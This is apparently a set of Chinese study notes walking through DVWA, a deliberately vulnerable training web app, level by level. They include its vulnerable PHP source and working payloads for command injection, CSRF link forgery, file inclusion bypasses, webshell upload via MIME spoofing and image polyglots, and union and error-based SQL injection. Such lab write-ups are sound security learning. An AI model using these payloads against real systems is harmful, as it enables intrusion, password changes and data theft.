Burp Force
low级别
burp抓包,爆破模块处理即可(low权限还存在一个sql注入漏洞)
Medium级别
去除了sql漏洞,依然采用burp爆破方式
High级别
多引入一个token字段,此值在响应里面,依然采用burp爆破,设置如下
Impossible级别
密码错误达到上限,进行时间限制,基本上没法用burp爆破模式
Command Injection
命令执行,通过&&、&、||、|、;等连接符,执行多条命令
&&:先执行cmd1,成功执行后再执行cmd2
&:先执行cmd1,不管是否成功都执行cmd2
||:先执行cmd1,失败后执行cmd2
|:先执行cmd1,再执行cmd2
;:linux下特有命令顺序执行
low级别
127.0.0.1 & dir
Medium级别
过滤了&&、;字符,依然采用&绕过就行 127.0.0.1 & dir
High级别
更加完善的黑名单内容,但是漏掉了 |,采用127.0.0.1 |dir
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
CSRF
low级别
直接拼接URL,访问即可改密码:当我们访问http://127.0.0.1/vulnerabilities/csrf/?password_new=888888&password_conf=888888&Change=Change我们的密码就会改变,我们可以伪造这条链接,发送给受害者,在不知不觉中对方的密码就会被修改。
Medium级别
检查了保留变量 HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,及要访问的主机名,这里是192.168.153.130),希望通过这种机制抵御CSRF攻击。漏洞利用过滤规则是http包头的Referer参数的值中必须包含主机名(这里是192.168.153.130)我们可以将攻击页面命名为192.168.153.130.html(页面被放置在攻击者的服务器里,这里是10.4.253.2)就可以绕过了
High级别
反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击。
File Inclusion(文件包含)
low级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
页面直接展示$file文件内容,直接构造一下:?page=E:\CTF\Tools\phpStudy\PHPTutorial\WWW\flag 读取本地文件,当然也可以加载远程文件:?page=http://127.0.0.1/index.php
Medium级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
增加了str_replace函数,对page参数进行了一定的处理,将http:// 、https://、 …/、…\替换为空字符,即删除,此时可以采用双写的方式绕过?page=hthttp://tp://127.0.0.1/index.php
High级别
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
代码规定只能包含file开头的文件和include.php文件,看似安全,但依然可以利用file协议绕过防护策略:
?page=file://E:\CTF\Tools\phpStudy\PHPTutorial\WWW\flag
File Upload
low级别
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
对上传的文件不做任何限制,直接上传一句话木马,蚁剑连接即可http://localhost/DVWA-master/hackable/uploads/one.php
Medium级别
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
对文件类型进行了限制,上传two.php,burp抓包修改成image/jpeg就行,蚁剑连接
High级别
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
限制了文件后缀必须为:jpg、jpeg、png,getimagesize限制了图片类型,所以采用图片码的方式+命令执行/文件包含绕过
- 制作图片码:copy /b test.jpg+ one.php one.jpg
- 图片码上传成功后,通过命令执行漏洞:127.0.0.1|copy xxxx/one.jpg xxx/one.php(这边命令多种多样,还需要积累一下)
- 文件包含漏洞执行php代码,将one.jpg改名成one.php,http://localhost/DVWA-master/vulnerabilities/fi/?page=file://E:\CTF\Tools\phpStudy\PHPTutorial\WWW\cmd.php(这边cmd.php的写法多种多样,还需要积累一下)
<?php
// system("copy E:\\CTF\\Tools\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\hackable\\uploads\\img.jpg E:\\CTF\\Tools\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\hackable\\uploads\\img.php");
rename("E:\\CTF\\Tools\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\hackable\\uploads\\img.jpg", "E:\\CTF\\Tools\\phpStudy\\PHPTutorial\\WWW\\DVWA-master\\hackable\\uploads\\img.php");
SQL Injection
low级别
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}
First name: {$first}
Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
}
?>
查询时,id直接拼接,未做任务限制,简单的联合查询结合输出情况,即可完成注入。
- 手工union注入
-1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“guestbook”#
- 手工updatexml报错注入
1’or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
1’or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘guestbook’)),0x7e),1))#
- 手工extractvalue报错注入
1’ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#
1’ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=“guestbook”),0x7e))#
- 手工floor(rand(0)*2)报错注入,此报错只能限制查询内容返回1条,不可group_concat(table_name)
1’ and (SELECT 1 from (SELECT count(*),concat(0x23, (select table_name from information_schema.tables where table_schema=database() limit 0,1), 0x23,floor(rand(0)*2)) as x from information_schema.tables GROUP BY x) as y)#
1’ and (SELECT 1 from (SELECT count(*),concat(0x23, (select column_name from information_schema.columns where table_name=“guestbook” limit 0,1), 0x23,floor(rand(0)*2)) as x from information_schema.tables GROUP BY x) as y)#
Medium级别
代码逻辑同low,只是这是不让前端输入,所以通过burp抓包,即可完成注入
High级别
<?php
if( isset( $_SESSION [ 'id' ] ) ) {
// Get input
$id = $_SESSION[ 'id' ];
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}
First name: {$first}
Surname: {$last}</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
代码逻辑就比low,加了一句 LIMIT 1。理论上手工注入,还是行得通
JavaScript
low级别
前端页面提醒,输入:success,但是输入后提示token错误,加上这道题是js的题目,进行代码审计可以发现:有个隐藏的input记录着token值,
Medium级别
前端提示同low,同样进行代码审计,发现token生成规则如下:XX+输入内容+XX然后逆序,所以success对应的token=XXsseccusXX
function do_something(e){
for(var t="",n=e.length-1;n>=0;n--)
t+=e[n];
return t
}
setTimeout(function(){do_elsesomething("XX")},300);
function do_elsesomething(e){
document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")
}